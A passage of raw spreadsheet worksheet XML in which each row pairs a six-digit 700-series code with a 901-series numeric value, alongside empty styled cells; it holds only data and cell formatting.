    <row r="6771" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6771" s="5">
        <v>700436</v>
      </c>
      <c r="B6771" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D6771" s="5"/>
      <c r="E6771" s="3"/>
      <c r="F6771" s="1"/>
      <c r="H6771" s="1"/>
    </row>
    <row r="6772" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6772" s="5">
        <v>700436</v>
      </c>
      <c r="B6772" s="3">
        <v>901140</v>
      </c>
      <c r="D6772" s="5"/>
      <c r="E6772" s="3"/>
      <c r="F6772" s="1"/>
      <c r="H6772" s="1"/>
    </row>
    <row r="6773" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6773" s="5">
        <v>700436</v>
      </c>
      <c r="B6773" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6773" s="5"/>
      <c r="E6773" s="3"/>
      <c r="F6773" s="1"/>
      <c r="H6773" s="1"/>
    </row>
    <row r="6774" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6774" s="5">
        <v>700436</v>
      </c>
      <c r="B6774" s="3">
        <v>901083</v>
      </c>
      <c r="D6774" s="5"/>
      <c r="E6774" s="3"/>
      <c r="F6774" s="1"/>
      <c r="H6774" s="1"/>
    </row>
    <row r="6775" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6775" s="5">
        <v>700436</v>
      </c>
      <c r="B6775" s="3">
        <v>901105</v>
      </c>
      <c r="D6775" s="5"/>
      <c r="E6775" s="3"/>
      <c r="F6775" s="1"/>
      <c r="H6775" s="1"/>
    </row>
    <row r="6776" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6776" s="5">
        <v>700436</v>
      </c>
      <c r="B6776" s="3">
        <v>901095</v>
      </c>
      <c r="D6776" s="5"/>
      <c r="E6776" s="3"/>
      <c r="F6776" s="1"/>
      <c r="H6776" s="1"/>
    </row>
    <row r="6777" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6777" s="5">
        <v>700436</v>
      </c>
      <c r="B6777" s="3">
        <v>901057</v>
      </c>
      <c r="D6777" s="5"/>
      <c r="E6777" s="3"/>
      <c r="F6777" s="1"/>
      <c r="H6777" s="1"/>
    </row>
    <row r="6778" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6778" s="5">
        <v>700436</v>
      </c>
      <c r="B6778" s="3">
        <v>901055</v>
      </c>
      <c r="D6778" s="5"/>
      <c r="E6778" s="3"/>
      <c r="F6778" s="1"/>
      <c r="H6778" s="1"/>
    </row>
    <row r="6779" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6779" s="5">
        <v>700436</v>
      </c>
      <c r="B6779" s="3">
        <v>901090</v>
      </c>
      <c r="D6779" s="5"/>
      <c r="E6779" s="3"/>
      <c r="F6779" s="1"/>
      <c r="H6779" s="1"/>
    </row>
    <row r="6780" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6780" s="5">
        <v>700436</v>
      </c>
      <c r="B6780" s="3">
        <v>901016</v>
      </c>
      <c r="D6780" s="5"/>
      <c r="E6780" s="3"/>
      <c r="F6780" s="1"/>
      <c r="H6780" s="1"/>
    </row>
    <row r="6781" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6781" s="5">
        <v>700436</v>
      </c>
      <c r="B6781" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D6781" s="5"/>
      <c r="E6781" s="3"/>
      <c r="F6781" s="1"/>
      <c r="H6781" s="1"/>
    </row>
    <row r="6782" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6782" s="5">
        <v>700647</v>
      </c>
      <c r="B6782" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6782" s="5"/>
      <c r="E6782" s="3"/>
      <c r="F6782" s="1"/>
      <c r="H6782" s="1"/>
    </row>
    <row r="6783" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6783" s="5">
        <v>700647</v>
      </c>
      <c r="B6783" s="3">
        <v>901560.00100000005</v>
      </c>
      <c r="D6783" s="5"/>
      <c r="E6783" s="3"/>
      <c r="F6783" s="1"/>
      <c r="H6783" s="1"/>
    </row>
    <row r="6784" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6784" s="5">
        <v>700647</v>
      </c>
      <c r="B6784" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6784" s="5"/>
      <c r="E6784" s="3"/>
      <c r="F6784" s="1"/>
      <c r="H6784" s="1"/>
    </row>
    <row r="6785" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6785" s="5">
        <v>700647</v>
      </c>
      <c r="B6785" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6785" s="5"/>
      <c r="E6785" s="3"/>
      <c r="F6785" s="1"/>
      <c r="H6785" s="1"/>
    </row>
    <row r="6786" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6786" s="5">
        <v>700647</v>
      </c>
      <c r="B6786" s="3">
        <v>901059.00399999996</v>
      </c>
      <c r="D6786" s="5"/>
      <c r="E6786" s="3"/>
      <c r="F6786" s="1"/>
      <c r="H6786" s="1"/>
    </row>
    <row r="6787" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6787" s="5">
        <v>700647</v>
      </c>
      <c r="B6787" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D6787" s="5"/>
      <c r="E6787" s="3"/>
      <c r="F6787" s="1"/>
      <c r="H6787" s="1"/>
    </row>
    <row r="6788" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6788" s="5">
        <v>700647</v>
      </c>
      <c r="B6788" s="3">
        <v>901001.00100000005</v>
      </c>
      <c r="D6788" s="5"/>
      <c r="E6788" s="3"/>
      <c r="F6788" s="1"/>
      <c r="H6788" s="1"/>
    </row>
    <row r="6789" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6789" s="5">
        <v>700647</v>
      </c>
      <c r="B6789" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D6789" s="5"/>
      <c r="E6789" s="3"/>
      <c r="F6789" s="1"/>
      <c r="H6789" s="1"/>
    </row>
    <row r="6790" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6790" s="5">
        <v>700647</v>
      </c>
      <c r="B6790" s="3">
        <v>901140</v>
      </c>
      <c r="D6790" s="5"/>
      <c r="E6790" s="3"/>
      <c r="F6790" s="1"/>
      <c r="H6790" s="1"/>
    </row>
    <row r="6791" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6791" s="5">
        <v>700647</v>
      </c>
      <c r="B6791" s="3">
        <v>901083</v>
      </c>
      <c r="D6791" s="5"/>
      <c r="E6791" s="3"/>
      <c r="F6791" s="1"/>
      <c r="H6791" s="1"/>
    </row>
    <row r="6792" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6792" s="5">
        <v>700647</v>
      </c>
      <c r="B6792" s="3">
        <v>901105</v>
      </c>
      <c r="D6792" s="5"/>
      <c r="E6792" s="3"/>
      <c r="F6792" s="1"/>
      <c r="H6792" s="1"/>
    </row>
    <row r="6793" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6793" s="5">
        <v>700647</v>
      </c>
      <c r="B6793" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D6793" s="5"/>
      <c r="E6793" s="3"/>
      <c r="F6793" s="1"/>
      <c r="H6793" s="1"/>
    </row>
    <row r="6794" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6794" s="5">
        <v>700647</v>
      </c>
      <c r="B6794" s="3">
        <v>901027</v>
      </c>
      <c r="D6794" s="5"/>
      <c r="E6794" s="3"/>
      <c r="F6794" s="1"/>
      <c r="H6794" s="1"/>
    </row>
    <row r="6795" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6795" s="5">
        <v>700647</v>
      </c>
      <c r="B6795" s="3">
        <v>901120</v>
      </c>
      <c r="D6795" s="5"/>
      <c r="E6795" s="3"/>
      <c r="F6795" s="1"/>
      <c r="H6795" s="1"/>
    </row>
    <row r="6796" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6796" s="5">
        <v>700647</v>
      </c>
      <c r="B6796" s="3">
        <v>901113</v>
      </c>
      <c r="D6796" s="5"/>
      <c r="E6796" s="3"/>
      <c r="F6796" s="1"/>
      <c r="H6796" s="1"/>
    </row>
    <row r="6797" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6797" s="5">
        <v>700647</v>
      </c>
      <c r="B6797" s="3">
        <v>901082</v>
      </c>
      <c r="D6797" s="5"/>
      <c r="E6797" s="3"/>
      <c r="F6797" s="1"/>
      <c r="H6797" s="1"/>
    </row>
    <row r="6798" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6798" s="5">
        <v>700647</v>
      </c>
      <c r="B6798" s="3">
        <v>901016</v>
      </c>
      <c r="D6798" s="5"/>
      <c r="E6798" s="3"/>
      <c r="F6798" s="1"/>
      <c r="H6798" s="1"/>
    </row>
    <row r="6799" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6799" s="5">
        <v>700647</v>
      </c>
      <c r="B6799" s="3">
        <v>901033</v>
      </c>
      <c r="D6799" s="5"/>
      <c r="E6799" s="3"/>
      <c r="F6799" s="1"/>
      <c r="H6799" s="1"/>
    </row>
    <row r="6800" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6800" s="5">
        <v>700199</v>
      </c>
      <c r="B6800" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6800" s="5"/>
      <c r="E6800" s="3"/>
      <c r="F6800" s="1"/>
      <c r="H6800" s="1"/>
    </row>
    <row r="6801" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6801" s="5">
        <v>700199</v>
      </c>
      <c r="B6801" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6801" s="5"/>
      <c r="E6801" s="3"/>
      <c r="F6801" s="1"/>
      <c r="H6801" s="1"/>
    </row>
    <row r="6802" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6802" s="5">
        <v>700199</v>
      </c>
      <c r="B6802" s="3">
        <v>901105</v>
      </c>
      <c r="D6802" s="5"/>
      <c r="E6802" s="3"/>
      <c r="F6802" s="1"/>
      <c r="H6802" s="1"/>
    </row>
    <row r="6803" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6803" s="5">
        <v>700199</v>
      </c>
      <c r="B6803" s="3">
        <v>901055.00399999996</v>
      </c>
      <c r="D6803" s="5"/>
      <c r="E6803" s="3"/>
      <c r="F6803" s="1"/>
      <c r="H6803" s="1"/>
    </row>
    <row r="6804" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6804" s="5">
        <v>700199</v>
      </c>
      <c r="B6804" s="3">
        <v>901113</v>
      </c>
      <c r="D6804" s="5"/>
      <c r="E6804" s="3"/>
      <c r="F6804" s="1"/>
      <c r="H6804" s="1"/>
    </row>
    <row r="6805" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6805" s="5">
        <v>700199</v>
      </c>
      <c r="B6805" s="3">
        <v>901082</v>
      </c>
      <c r="D6805" s="5"/>
      <c r="E6805" s="3"/>
      <c r="F6805" s="1"/>
      <c r="H6805" s="1"/>
    </row>
    <row r="6806" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6806" s="5">
        <v>700302</v>
      </c>
      <c r="B6806" s="3">
        <v>901476</v>
      </c>
      <c r="D6806" s="5"/>
      <c r="E6806" s="3"/>
      <c r="F6806" s="1"/>
      <c r="H6806" s="1"/>
    </row>
    <row r="6807" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6807" s="5">
        <v>700302</v>
      </c>
      <c r="B6807" s="3">
        <v>901521</v>
      </c>
      <c r="D6807" s="5"/>
      <c r="E6807" s="3"/>
      <c r="F6807" s="1"/>
      <c r="H6807" s="1"/>
    </row>
    <row r="6808" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6808" s="5">
        <v>700302</v>
      </c>
      <c r="B6808" s="3">
        <v>901508</v>
      </c>
      <c r="D6808" s="5"/>
      <c r="E6808" s="3"/>
      <c r="F6808" s="1"/>
      <c r="H6808" s="1"/>
    </row>
    <row r="6809" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6809" s="5">
        <v>700302</v>
      </c>
      <c r="B6809" s="3">
        <v>901481</v>
      </c>
      <c r="D6809" s="5"/>
      <c r="E6809" s="3"/>
      <c r="F6809" s="1"/>
      <c r="H6809" s="1"/>
    </row>
    <row r="6810" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6810" s="5">
        <v>700263</v>
      </c>
      <c r="B6810" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6810" s="5"/>
      <c r="E6810" s="3"/>
      <c r="F6810" s="1"/>
      <c r="H6810" s="1"/>
    </row>
    <row r="6811" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6811" s="5">
        <v>700263</v>
      </c>
      <c r="B6811" s="3">
        <v>901059.005</v>
      </c>
      <c r="D6811" s="5"/>
      <c r="E6811" s="3"/>
      <c r="F6811" s="1"/>
      <c r="H6811" s="1"/>
    </row>
    <row r="6812" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6812" s="5">
        <v>700263</v>
      </c>
      <c r="B6812" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D6812" s="5"/>
      <c r="E6812" s="3"/>
      <c r="F6812" s="1"/>
      <c r="H6812" s="1"/>
    </row>
    <row r="6813" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6813" s="5">
        <v>700263</v>
      </c>
      <c r="B6813" s="3">
        <v>901140</v>
      </c>
      <c r="D6813" s="5"/>
      <c r="E6813" s="3"/>
      <c r="F6813" s="1"/>
      <c r="H6813" s="1"/>
    </row>
    <row r="6814" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6814" s="5">
        <v>700263</v>
      </c>
      <c r="B6814" s="3">
        <v>901083</v>
      </c>
      <c r="D6814" s="5"/>
      <c r="E6814" s="3"/>
      <c r="F6814" s="1"/>
      <c r="H6814" s="1"/>
    </row>
    <row r="6815" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6815" s="5">
        <v>700263</v>
      </c>
      <c r="B6815" s="3">
        <v>901562.00399999996</v>
      </c>
      <c r="D6815" s="5"/>
      <c r="E6815" s="3"/>
      <c r="F6815" s="1"/>
      <c r="H6815" s="1"/>
    </row>
    <row r="6816" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6816" s="5">
        <v>700263</v>
      </c>
      <c r="B6816" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6816" s="5"/>
      <c r="E6816" s="3"/>
      <c r="F6816" s="1"/>
      <c r="H6816" s="1"/>
    </row>
    <row r="6817" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6817" s="5">
        <v>700263</v>
      </c>
      <c r="B6817" s="3">
        <v>901105</v>
      </c>
      <c r="D6817" s="5"/>
      <c r="E6817" s="3"/>
      <c r="F6817" s="1"/>
      <c r="H6817" s="1"/>
    </row>
    <row r="6818" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6818" s="5">
        <v>700263</v>
      </c>
      <c r="B6818" s="3">
        <v>901112</v>
      </c>
      <c r="D6818" s="5"/>
      <c r="E6818" s="3"/>
      <c r="F6818" s="1"/>
      <c r="H6818" s="1"/>
    </row>
    <row r="6819" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6819" s="5">
        <v>700263</v>
      </c>
      <c r="B6819" s="3">
        <v>901571</v>
      </c>
      <c r="D6819" s="5"/>
      <c r="E6819" s="3"/>
      <c r="F6819" s="1"/>
      <c r="H6819" s="1"/>
    </row>
    <row r="6820" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6820" s="5">
        <v>700263</v>
      </c>
      <c r="B6820" s="3">
        <v>901027</v>
      </c>
      <c r="D6820" s="5"/>
      <c r="E6820" s="3"/>
      <c r="F6820" s="1"/>
      <c r="H6820" s="1"/>
    </row>
    <row r="6821" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6821" s="5">
        <v>700263</v>
      </c>
      <c r="B6821" s="3">
        <v>901090</v>
      </c>
      <c r="D6821" s="5"/>
      <c r="E6821" s="3"/>
      <c r="F6821" s="1"/>
      <c r="H6821" s="1"/>
    </row>
    <row r="6822" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6822" s="5">
        <v>700263</v>
      </c>
      <c r="B6822" s="3">
        <v>901082</v>
      </c>
      <c r="D6822" s="5"/>
      <c r="E6822" s="3"/>
      <c r="F6822" s="1"/>
      <c r="H6822" s="1"/>
    </row>
    <row r="6823" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6823" s="5">
        <v>700263</v>
      </c>
      <c r="B6823" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D6823" s="5"/>
      <c r="E6823" s="3"/>
      <c r="F6823" s="1"/>
      <c r="H6823" s="1"/>
    </row>
    <row r="6824" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6824" s="5">
        <v>700116</v>
      </c>
      <c r="B6824" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D6824" s="5"/>
      <c r="E6824" s="3"/>
      <c r="F6824" s="1"/>
      <c r="H6824" s="1"/>
    </row>
    <row r="6825" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6825" s="5">
        <v>700333</v>
      </c>
      <c r="B6825" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6825" s="5"/>
      <c r="E6825" s="3"/>
      <c r="F6825" s="1"/>
      <c r="H6825" s="1"/>
    </row>
    <row r="6826" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6826" s="5">
        <v>700333</v>
      </c>
      <c r="B6826" s="3">
        <v>901197</v>
      </c>
      <c r="D6826" s="5"/>
      <c r="E6826" s="3"/>
      <c r="F6826" s="1"/>
      <c r="H6826" s="1"/>
    </row>
    <row r="6827" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6827" s="5">
        <v>700333</v>
      </c>
      <c r="B6827" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6827" s="5"/>
      <c r="E6827" s="3"/>
      <c r="F6827" s="1"/>
      <c r="H6827" s="1"/>
    </row>
    <row r="6828" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6828" s="5">
        <v>700333</v>
      </c>
      <c r="B6828" s="3">
        <v>901105</v>
      </c>
      <c r="D6828" s="5"/>
      <c r="E6828" s="3"/>
      <c r="F6828" s="1"/>
      <c r="H6828" s="1"/>
    </row>
    <row r="6829" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6829" s="5">
        <v>700333</v>
      </c>
      <c r="B6829" s="3">
        <v>901027</v>
      </c>
      <c r="D6829" s="5"/>
      <c r="E6829" s="3"/>
      <c r="F6829" s="1"/>
      <c r="H6829" s="1"/>
    </row>
    <row r="6830" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6830" s="5">
        <v>700333</v>
      </c>
      <c r="B6830" s="3">
        <v>901057</v>
      </c>
      <c r="D6830" s="5"/>
      <c r="E6830" s="3"/>
      <c r="F6830" s="1"/>
      <c r="H6830" s="1"/>
    </row>
    <row r="6831" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6831" s="5">
        <v>700333</v>
      </c>
      <c r="B6831" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D6831" s="5"/>
      <c r="E6831" s="3"/>
      <c r="F6831" s="1"/>
      <c r="H6831" s="1"/>
    </row>
    <row r="6832" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6832" s="5">
        <v>700333</v>
      </c>
      <c r="B6832" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D6832" s="5"/>
      <c r="E6832" s="3"/>
      <c r="F6832" s="1"/>
      <c r="H6832" s="1"/>
    </row>
    <row r="6833" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6833" s="5">
        <v>700221</v>
      </c>
      <c r="B6833" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6833" s="5"/>
      <c r="E6833" s="3"/>
      <c r="F6833" s="1"/>
      <c r="H6833" s="1"/>
    </row>
    <row r="6834" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6834" s="5">
        <v>700221</v>
      </c>
      <c r="B6834" s="3">
        <v>901095</v>
      </c>
      <c r="D6834" s="5"/>
      <c r="E6834" s="3"/>
      <c r="F6834" s="1"/>
      <c r="H6834" s="1"/>
    </row>
    <row r="6835" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6835" s="5">
        <v>700221</v>
      </c>
      <c r="B6835" s="3">
        <v>901014</v>
      </c>
      <c r="D6835" s="5"/>
      <c r="E6835" s="3"/>
      <c r="F6835" s="1"/>
      <c r="H6835" s="1"/>
    </row>
    <row r="6836" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6836" s="5">
        <v>700221</v>
      </c>
      <c r="B6836" s="3">
        <v>901205</v>
      </c>
      <c r="D6836" s="5"/>
      <c r="E6836" s="3"/>
      <c r="F6836" s="1"/>
      <c r="H6836" s="1"/>
    </row>
    <row r="6837" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6837" s="5">
        <v>700221</v>
      </c>
      <c r="B6837" s="3">
        <v>901078.00300000003</v>
      </c>
      <c r="D6837" s="5"/>
      <c r="E6837" s="3"/>
      <c r="F6837" s="1"/>
      <c r="H6837" s="1"/>
    </row>
    <row r="6838" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6838" s="5">
        <v>700130</v>
      </c>
      <c r="B6838" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D6838" s="5"/>
      <c r="E6838" s="3"/>
      <c r="F6838" s="1"/>
      <c r="H6838" s="1"/>
    </row>
    <row r="6839" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6839" s="5">
        <v>700130</v>
      </c>
      <c r="B6839" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D6839" s="5"/>
      <c r="E6839" s="3"/>
      <c r="F6839" s="1"/>
      <c r="H6839" s="1"/>
    </row>
    <row r="6840" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6840" s="5">
        <v>700130</v>
      </c>
      <c r="B6840" s="3">
        <v>901105</v>
      </c>
      <c r="D6840" s="5"/>
      <c r="E6840" s="3"/>
      <c r="F6840" s="1"/>
      <c r="H6840" s="1"/>
    </row>
    <row r="6841" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6841" s="5">
        <v>700130</v>
      </c>
      <c r="B6841" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D6841" s="5"/>
      <c r="E6841" s="3"/>
      <c r="F6841" s="1"/>
      <c r="H6841" s="1"/>
    </row>
    <row r="6842" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6842" s="5">
        <v>700130</v>
      </c>
      <c r="B6842" s="3">
        <v>901091</v>
      </c>
      <c r="D6842" s="5"/>
      <c r="E6842" s="3"/>
      <c r="F6842" s="1"/>
      <c r="H6842" s="1"/>
    </row>
    <row r="6843" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6843" s="5">
        <v>700130</v>
      </c>
      <c r="B6843" s="3">
        <v>901082</v>
      </c>
      <c r="D6843" s="5"/>
      <c r="E6843" s="3"/>
      <c r="F6843" s="1"/>
      <c r="H6843" s="1"/>
    </row>
    <row r="6844" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6844" s="5">
        <v>700130</v>
      </c>
      <c r="B6844" s="3">
        <v>901016</v>
      </c>
      <c r="D6844" s="5"/>
      <c r="E6844" s="3"/>
      <c r="F6844" s="1"/>
      <c r="H6844" s="1"/>
    </row>
    <row r="6845" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6845" s="5">
        <v>700130</v>
      </c>
      <c r="B6845" s="3">
        <v>901033</v>
      </c>
      <c r="D6845" s="5"/>
      <c r="E6845" s="3"/>
      <c r="F6845" s="1"/>
      <c r="H6845" s="1"/>
    </row>
    <row r="6846" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6846" s="5">
        <v>700275</v>
      </c>
      <c r="B6846" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6846" s="5"/>
      <c r="E6846" s="3"/>
      <c r="F6846" s="1"/>
      <c r="H6846" s="1"/>
    </row>
    <row r="6847" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6847" s="5">
        <v>700275</v>
      </c>
      <c r="B6847" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6847" s="5"/>
      <c r="E6847" s="3"/>
      <c r="F6847" s="1"/>
      <c r="H6847" s="1"/>
    </row>
    <row r="6848" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6848" s="5">
        <v>700275</v>
      </c>
      <c r="B6848" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6848" s="5"/>
      <c r="E6848" s="3"/>
      <c r="F6848" s="1"/>
      <c r="H6848" s="1"/>
    </row>
    <row r="6849" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6849" s="5">
        <v>700275</v>
      </c>
      <c r="B6849" s="3">
        <v>901083</v>
      </c>
      <c r="D6849" s="5"/>
      <c r="E6849" s="3"/>
      <c r="F6849" s="1"/>
      <c r="H6849" s="1"/>
    </row>
    <row r="6850" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6850" s="5">
        <v>700275</v>
      </c>
      <c r="B6850" s="3">
        <v>901105</v>
      </c>
      <c r="D6850" s="5"/>
      <c r="E6850" s="3"/>
      <c r="F6850" s="1"/>
      <c r="H6850" s="1"/>
    </row>
    <row r="6851" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6851" s="5">
        <v>700275</v>
      </c>
      <c r="B6851" s="3">
        <v>901113</v>
      </c>
      <c r="D6851" s="5"/>
      <c r="E6851" s="3"/>
      <c r="F6851" s="1"/>
      <c r="H6851" s="1"/>
    </row>
    <row r="6852" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6852" s="5">
        <v>700275</v>
      </c>
      <c r="B6852" s="3">
        <v>901082</v>
      </c>
      <c r="D6852" s="5"/>
      <c r="E6852" s="3"/>
      <c r="F6852" s="1"/>
      <c r="H6852" s="1"/>
    </row>
    <row r="6853" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6853" s="5">
        <v>700275</v>
      </c>
      <c r="B6853" s="3">
        <v>901016</v>
      </c>
      <c r="D6853" s="5"/>
      <c r="E6853" s="3"/>
      <c r="F6853" s="1"/>
      <c r="H6853" s="1"/>
    </row>
    <row r="6854" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6854" s="5">
        <v>700275</v>
      </c>
      <c r="B6854" s="3">
        <v>901033</v>
      </c>
      <c r="D6854" s="5"/>
      <c r="E6854" s="3"/>
      <c r="F6854" s="1"/>
      <c r="H6854" s="1"/>
    </row>
    <row r="6855" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6855" s="5">
        <v>700275</v>
      </c>
      <c r="B6855" s="3">
        <v>901124</v>
      </c>
      <c r="D6855" s="5"/>
      <c r="E6855" s="3"/>
      <c r="F6855" s="1"/>
      <c r="H6855" s="1"/>
    </row>
    <row r="6856" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6856" s="5">
        <v>700022</v>
      </c>
      <c r="B6856" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D6856" s="5"/>
      <c r="E6856" s="3"/>
      <c r="F6856" s="1"/>
      <c r="H6856" s="1"/>
    </row>
    <row r="6857" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6857" s="5">
        <v>700022</v>
      </c>
      <c r="B6857" s="3">
        <v>901014</v>
      </c>
      <c r="D6857" s="5"/>
      <c r="E6857" s="3"/>
      <c r="F6857" s="1"/>
      <c r="H6857" s="1"/>
    </row>
    <row r="6858" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6858" s="5">
        <v>700386</v>
      </c>
      <c r="B6858" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6858" s="5"/>
      <c r="E6858" s="3"/>
      <c r="F6858" s="1"/>
      <c r="H6858" s="1"/>
    </row>
    <row r="6859" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6859" s="5">
        <v>700386</v>
      </c>
      <c r="B6859" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6859" s="5"/>
      <c r="E6859" s="3"/>
      <c r="F6859" s="1"/>
      <c r="H6859" s="1"/>
    </row>
    <row r="6860" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6860" s="5">
        <v>700386</v>
      </c>
      <c r="B6860" s="3">
        <v>901185</v>
      </c>
      <c r="D6860" s="5"/>
      <c r="E6860" s="3"/>
      <c r="F6860" s="1"/>
      <c r="H6860" s="1"/>
    </row>
    <row r="6861" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6861" s="5">
        <v>700386</v>
      </c>
      <c r="B6861" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D6861" s="5"/>
      <c r="E6861" s="3"/>
      <c r="F6861" s="1"/>
      <c r="H6861" s="1"/>
    </row>
    <row r="6862" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6862" s="5">
        <v>700386</v>
      </c>
      <c r="B6862" s="3">
        <v>901059.005</v>
      </c>
      <c r="D6862" s="5"/>
      <c r="E6862" s="3"/>
      <c r="F6862" s="1"/>
      <c r="H6862" s="1"/>
    </row>
    <row r="6863" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6863" s="5">
        <v>700386</v>
      </c>
      <c r="B6863" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D6863" s="5"/>
      <c r="E6863" s="3"/>
      <c r="F6863" s="1"/>
      <c r="H6863" s="1"/>
    </row>
    <row r="6864" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6864" s="5">
        <v>700386</v>
      </c>
      <c r="B6864" s="3">
        <v>901132</v>
      </c>
      <c r="D6864" s="5"/>
